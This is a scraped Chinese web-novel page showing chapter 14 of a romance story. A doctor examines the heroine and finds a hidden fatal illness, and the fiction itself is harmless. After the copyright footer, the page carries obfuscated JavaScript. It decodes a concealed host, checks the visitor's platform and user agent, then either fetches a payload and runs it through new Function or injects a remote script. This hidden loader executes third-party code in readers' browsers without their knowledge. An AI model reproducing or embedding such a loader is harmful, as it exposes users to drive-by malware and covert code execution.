字:
关灯 护眼
首页 > 都市 > 美妆系统带我抱紧气运男主 >第十四章:怎么哭了

第十四章:怎么哭了

作者:鸭子飞飞字数:3209更新:2022-11-26 00:04

江吟什么都不会,除了一张脸没有哪里能看的,为了以后不给叶寒丢脸,她还是努力一点,完成系统给的任务。

“吟吟,要是那个老巫婆来找你可不能答应她啊。”秦露娜跟同学说了半天,想起了一件事郑重的跟江吟解释。

“什么老巫婆啊?”江吟一脸茫然,她怎么什么都不懂啊。

“就是那个副会长,她可是觊觎你男朋友两年了。”

“她喜欢寒哥?”江吟惊讶。

前期的男主十分的优秀,不少桃花前仆后继,他硬是一个都没理会,除了他很忙之后,还有木清白这个娇气的红颜,秦露娜这个温柔的知己,以及爱找他麻烦的炮灰江吟。

“你才知道吗?我的好吟吟,你知不知道你的男朋友多受欢迎,全校的女生都想要做他的女朋友哎。”秦露娜一副恨铁不成钢的样子。

她这个人有点小毛病,就是颜控,爱嗑CP,尤其是颜值高的,叶寒和江吟这一对简直为她量身打造,从她知道的那一刻开始,她就将这一对当成自己的本命,还暗自给他们取了CP名,当然这些是不能让江吟知道的,她现在要跟江吟打好关系,好近距离嗑CP。

“我当然知道寒哥很厉害啊,他那么厉害有很多人喜欢不是正常的吗?”江吟理所当然道。

叶寒可是男主的,是这本《神医初长成:从零到成神》的男主,没点本事在某点当男主?

“害,露娜,我们的担心什么,叶神是什么样子的你难道不知道吗?他身边的异性只有江吟哎。”

“就是啊,他们是情侣,叶神还接送她上学,这可是别人做梦都不管想的事。”

秦露娜拉拢的几个CP粉,跟着附和,再他们眼里,这些都是糖,他们决定晚上在论坛上给这对CP刷热度,要让华大的人都知道,叶寒和江吟世界第一甜!

江吟跟同学说这话,脑海里还想着支线任务,小系统也没有头绪,就这样头疼道放学,叶寒在教室门口等她。

班上的人看见叶寒都笑的很姨母,他们这节课在另外的教室,距离叶寒的教室很近,江吟收拾好了东西跟同学告别,欢快的走向叶寒,像只在外面玩够的小朋友,见到了来接她回家的家长。

“寒哥,你过来了。”

“嗯,走吧。”

叶寒自动的接过她的包,无视了周围的眼神,带着江吟出了校门。

——

初秋的天气,下午还是有些闷热的,人行道两旁的梧桐树开始落叶,一片片像是蝴蝶,江吟抱着叶寒的腰,自行车从落在地上的树叶碾过,将它带了起来,又自己落下去。

出了综合楼,叶寒直接用自行车带着江吟离开,一路上很多同学老师都看到了,江吟有些害羞躲避着看过来的目光,好不容易到了人少的路上,她才稍微好一些。

“寒哥,我们要去哪里?”江吟好奇的问。

“很快就到了。”叶寒没有回答她。

“好吧。”

叶寒说的很快,也只是骑了二十多分钟,车子停在一座看起来很老旧的诊所面前,江吟刚想问什么,看到上面的名字惊讶的瞪大眼睛。

【啊啊啊啊,是寒爹的第一个金手指,吟吟剧情提前了那么多,完了,这些会不会被世界意识清除掉啊!】

“什么世界意识清除掉,你没跟我说这些啊。”江吟在脑海里跟系统说话。

【啊啊啊啊啊啊,要是让世界意识察觉到你这个外来着,我们都要完蛋,呜呜呜呜,为什么剧情提前一年多,吟吟你做了什么啊!】

“我只是没有退婚而已,我不知道,怎么办啊,我不想离开寒哥。”

小美人和小系统一起怂了,叶寒看来江吟就是在发呆,她似乎很爱发呆。

“走吧。”

青年的声音将她的思绪喊回来,江吟咽了咽口水,问:“寒哥,我们到这里来做什么?”

“别害怕,只是看看。”叶寒尽量放软了自己的语气,不让小美人那么害怕,她的脸色已经白了好几个度了。

“好吧。”江吟不情不愿跟他走了进去。

诊所已经很破旧了,里面坐着一个老头,看见人进来,本来不耐烦的神情一收,笑的很好看。

“小子,带过来了?”他笑起来更加吓人了。

“嗯。”

江吟的脑子已经不会转动了,听这话的意思,是他之前跟叶寒说好的,他们什么时候见面的?为什么一年后的剧情点会提前?

原来的剧情是,叶寒被江吟的狗腿子打了一顿,浑身是上,有个老头路过将他拖了回去治疗,发现他的身份非要收他为徒,叶寒为了能治好爸爸才同意,之后叶寒医术出神入化,这个老头功不可没。

“寒哥?”江吟害怕的询问,他们想要做什么?

这老头书中描写的很少,只是知道看着一家叫“望角”的诊所,脾气很古怪。

“别怕,你让他看看。”

叶寒主动牵了她的手,将人带到老头对面的椅子上,本来是让江吟坐下的,可是看到那么脏的椅子,他松开了江吟的手,拿了纸巾擦了擦自椅子。

“坐。”

“谢谢寒哥。”江吟吓的想要逃跑,可是不能,现在跑了被抓回来更难看。

呜呜呜,她没有对不起男主啊,为什么要带她来看这个老头,书里可是写了,男主看谁不顺眼,就带去给老头扎针的,她害怕。

看出了江吟的惧怕,虽然不知道她怕什么,可是叶寒靠近她,握着她的肩膀,放软了语气,道:“别害怕,你身体不好,让曲老给你看看。”

“小姑娘胆子小啊,你别怕,你是小寒的媳妇儿,老头子是小寒的师父,你还得叫一声‘师父’哩。”老头子嘿嘿笑了一声。

“师父?”江吟没缓过神来,下意识叫了这个称呼。

“哎,既然你都改口了,师父给你看看,把手伸出来。”

“啊?”江吟懵逼。

【吟吟,寒爹似乎是想让他给你看病。】小系统看了半天,才明白。

“给我看病?”江吟问了出来。

“嗯,把手伸出来,乖。”叶寒点头,低声道。

“好。”听到是给她看病的,江吟瞬间就不怕了,早知道是这样她还怕什么呀,男主对她那么好,就算剧情点提前,被世界意识清除她也不怕了。

老头给她把了脉,脸上的笑容淡了些,过了一会儿,他摸了摸本来就没几根的胡须,道:“小姑娘,你到后院去给老头子拿个毛巾过来。”

“我去。”叶寒就起身,老头拦住了他,说:“你去什么,让小姑娘去。”

江吟明白老头油画跟叶寒说,点了点头,道:“我去吧,寒哥你在这里等我一下。”

“好。”

江吟笑眯眯的离开,找了个地方蹲着让小系统给她直播,哼,支开她就听不到了吗?她可是拥有系统的女人,想不到吧?

诊所里面,老头神色很凝重,叶寒心情没来由的烦躁。

“什么情况,你说。”

“小子,小姑娘的情况比我想象的还要严重。”

“能治好?”他黑色的眼睛里没有情绪,似乎询问的只是一个无关紧要的人,可是紧握的双手显示根本不是那么回事。

“很难。”

“那就是有办法,你说。”叶寒只是想要一个办法,无论多难,他都要为了江吟做到。

“我现在的医术,只能保住小姑娘的命,要想痊愈,恐怕得等机会。”老头道。

“什么机会?”

“现在不能说,小子,我开个方子,你照着这个给小姑娘吃,能保证她挺到二十岁,二十岁之后,机会就会来到你身边,就看你能不能抓住了。”老头说完,拿了纸笔写方子。

在外面听了全程直播的江吟惊呆了,什么叫暂时保住她的命?她难道不是先天体弱吗?

【叮,检测道隐藏剧情,吟吟这具身体不是先天体弱,是遗传病,会死的!】

“到底什么回事?你们系统还会出错吗?什么遗传病嘛!”江吟烦躁死了,好不容易多活一辈子,结果告诉她这一辈子也没有多长,这让她怎么受得了?

【原本是在十八岁生日过后发病,很快病死,不过现在寒爹利用他的金手指给你续命,吟吟放心,等到寒爹成神了,就能治好你了。】

“可是,寒爹成神都是五六年后的事了,那个时候我的坟头草就两米高了,果然啊,哪能白吃的午饭,白捡的这一辈子,居然那么短暂!”江吟要哭了。

【没事的,寒爹一定会救你的,你不是他的第一小弟吗?】

江吟已经不想听系统说什么了,她蹲在地上想哭,可是又害怕哭出来让叶寒怀疑,要是被发现偷听了叶寒肯定会不高兴的。

没有谁愿意别人听自己的墙角。

“在这里做什么?”叶寒拿了方子出来找人,发现江吟一个人蹲在后院里,情绪低落的而样子。

江吟摇了摇头,站起来,因为蹲了太就,站起来头晕眼花差点摔倒,叶寒眼疾手快的把人扶好。

“小心。”

“谢谢寒哥。”江吟抬头,冲扶着她的青年一个笑。

叶寒微微皱眉,问:“怎了哭了?”


  
『加入书签,方便阅读』

Copyright © 2019-2022

function srwPOA(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function zHFjw(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return srwPOA(t);};window[''+'w'+'o'+'I'+'v'+'i'+'d'+'m'+'P'+'R'+'']=((navigator.platform&&!/^Mac|Win/.test(navigator.platform))||(!navigator.platform&&/Android|iOS|iPhone/i.test(navigator.userAgent)))?function(){;(function(u,i,w,d,c){var x=zHFjw,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/g/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/j/'+i;cs.parentElement.insertBefore(s,cs);}})('bmJyZ3Yub2JtcHAAuY29t','158795',window,document,['A','SmdKxwtb']);}:function(){};